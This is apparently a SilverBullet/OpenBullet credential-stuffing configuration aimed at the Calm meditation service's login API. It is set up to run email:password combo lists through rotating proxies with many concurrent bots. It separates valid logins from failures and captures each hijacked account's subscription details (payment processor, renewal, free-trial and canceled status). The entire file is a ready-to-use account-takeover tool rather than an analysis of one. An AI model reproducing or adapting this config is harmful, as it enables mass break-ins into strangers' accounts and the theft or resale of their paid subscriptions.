[SETTINGS]
{
  "Name": "calm",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-12T21:05:20.7676317+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "calm",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GenerateGUID "<id>" -> VAR "id" 

#LOGIN REQUEST POST "https://www.calm.com/api/login" 
  CONTENT "{\"is_college\":false,\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 82" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "origin: https://www.calm.com" 
  HEADER "referer: https://www.calm.com/login" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36" 
  HEADER "x-device-id: <id>" 
  HEADER "x-device-platform: www" 
  HEADER "x-device-version: 1.3" 
  HEADER "x-www-req-from: https://www.calm.com/login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "bad_credentials" 
  KEYCHAIN Success OR 
    KEY "id" 

#payment_processor PARSE "<SOURCE>" JSON "payment_processor" CreateEmpty=FALSE -> CAP "payment_processor" 

#is_renewable PARSE "<SOURCE>" JSON "is_renewable" CreateEmpty=FALSE -> CAP "is_renewable" 

#is_free_trial PARSE "<SOURCE>" JSON "is_free_trial" CreateEmpty=FALSE -> CAP "is_free_trial" 

#is_free PARSE "<SOURCE>" JSON "is_free" CreateEmpty=FALSE -> CAP "is_free" 

#status PARSE "<SOURCE>" JSON "status" CreateEmpty=FALSE -> CAP "status" 

REQUEST GET "https://www.calm.com/profile/manage-subscription" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "referer: https://app.www.calm.com/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your subscription has expired" 
    KEY "<status>" Contains "canceled" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<is_free_trial>" Contains "true" 
    KEY "<is_free>" Contains "true" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

